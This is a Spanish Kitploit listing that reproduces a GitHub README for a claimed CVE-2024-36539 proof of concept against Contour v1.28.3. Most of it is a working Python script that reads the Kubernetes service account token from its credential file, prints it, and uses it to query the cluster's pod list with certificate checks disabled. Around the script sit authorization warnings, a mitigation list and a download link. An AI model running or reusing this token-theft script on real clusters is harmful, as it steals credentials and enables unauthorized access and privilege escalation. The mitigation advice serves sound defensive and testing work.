Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/abdurahmon3236/cve-2024-36539
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónSeguridad en la NubeRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
abdurahmon3236/cve-2024-36539

CVE-2024-36539

Exploit PoC para permisos inseguros en Contour v1.28.3 que recupera un token de cuenta de servicio de Kubernetes y accede a la API del clúster, demostrando escalada de privilegios.

Ver Repositorio
1hace 2 añosAún no revisado

Prueba de Concepto (PoC) para Vulnerabilidad de Permisos Inseguros en Contour v1.28.3

Este repositorio contiene un script de Prueba de Concepto (PoC) que demuestra una vulnerabilidad de permisos inseguros en Contour v1.28.3. Esta vulnerabilidad permite a atacantes acceder a datos sensibles y escalar privilegios obteniendo el token de la cuenta de servicio.

Descripción de la Vulnerabilidad

CVE-ID: (Pendiente)

Resumen: Contour v1.28.3 contiene permisos inseguros que permiten a atacantes acceder al token de la cuenta de servicio. Al explotar esta vulnerabilidad, un atacante puede obtener el token de la cuenta de servicio, el cual puede ser utilizado para acceder a datos sensibles y potencialmente escalar privilegios dentro del clúster de Kubernetes.

Versiones Afectadas:

  • Contour v1.28.3

Mitigaciones:

  • Revisar y ajustar los permisos de las cuentas de servicio utilizadas por Contour.
  • Asegurar que las cuentas de servicio tengan los permisos mínimos requeridos.
  • Auditar y rotar regularmente los tokens de las cuentas de servicio.

Detalles del PoC

Este script PoC demuestra cómo acceder al token de la cuenta de servicio en Contour v1.28.3. Asegúrate de tener permiso explícito para realizar esta prueba.

Script PoC

root@kitploit:~
import os
import requests

# Configuration
kubernetes_api_url = "https://kubernetes.default.svc"  # Kubernetes API URL
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"  # Path to the service account token
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"  # Path to the namespace

def get_service_account_token():
    try:
        # Read the service account token
        with open(token_path, 'r') as token_file:
            token = token_file.read().strip()
        print(f"[+] Service Account Token: {token}")
        return token
    except Exception as e:
        print(f"[-] Error reading token: {e}")
        return None

def get_namespace():
    try:
        # Read the namespace
        with open(namespace_path, 'r') as namespace_file:
            namespace = namespace_file.read().strip()
        print(f"[+] Namespace: {namespace}")
        return namespace
    except Exception as e:
        print(f"[-] Error reading namespace: {e}")
        return None

def access_kubernetes_api(token, namespace):
    try:
        # Set the headers with the token
        headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        }
        
        # Make a request to the Kubernetes API to get pods in the namespace
        response = requests.get(f"{kubernetes_api_url}/api/v1/namespaces/{namespace}/pods", headers=headers, verify=False)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.json())
        
        if response.status_code == 200:
            print("[+] Successfully accessed Kubernetes API.")
        else:
            print("[-] Failed to access Kubernetes API.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Get the service account token and namespace
    token = get_service_account_token()
    namespace = get_namespace()
    
    if token and namespace:
        # Access the Kubernetes API using the token
        access_kubernetes_api(token, namespace)

Explicación

  1. Configuración: El script configura la URL de la API de Kubernetes y las rutas a los archivos del token y el namespace de la cuenta de servicio.
  2. Obtener el Token de la Cuenta de Servicio: Lee el token de la cuenta de servicio desde el sistema de archivos.
  3. Obtener el Namespace: Lee el namespace desde el sistema de archivos.
  4. Acceder a la API de Kubernetes: Utiliza el token para realizar una solicitud a la API de Kubernetes y listar los pods en el namespace.

Consideraciones Importantes

  • Permisos: Asegúrate de tener permiso explícito para probar esta vulnerabilidad en el sistema de destino. Las pruebas no autorizadas son ilegales y poco éticas.
  • Entorno de Pruebas: Realiza las pruebas en un entorno controlado para evitar afectar sistemas de producción.
  • Uso Ético: Utiliza este PoC de manera responsable y solo en contextos autorizados.

Mitigación

Para abordar esta vulnerabilidad:

  1. Revisar los Permisos de la Cuenta de Servicio: Asegúrate de que las cuentas de servicio tengan los permisos mínimos requeridos.
  2. Auditar y Rotar Tokens: Audita regularmente las cuentas de servicio y rota los tokens para minimizar el riesgo de compromiso de tokens.
  3. Actualizar Contour: Mantén Contour y otros componentes de Kubernetes actualizados con los últimos parches de seguridad.

Para obtener más información sobre cómo asegurar tu implementación de Contour, consulta la documentación oficial de Contour.


Este README.md proporciona una visión general de la vulnerabilidad, un script PoC para demostrar el problema e instrucciones sobre cómo mitigar el riesgo. Asegúrate de manejar este PoC de manera responsable y solo en sistemas donde tengas autorización explícita.

Descargar herramienta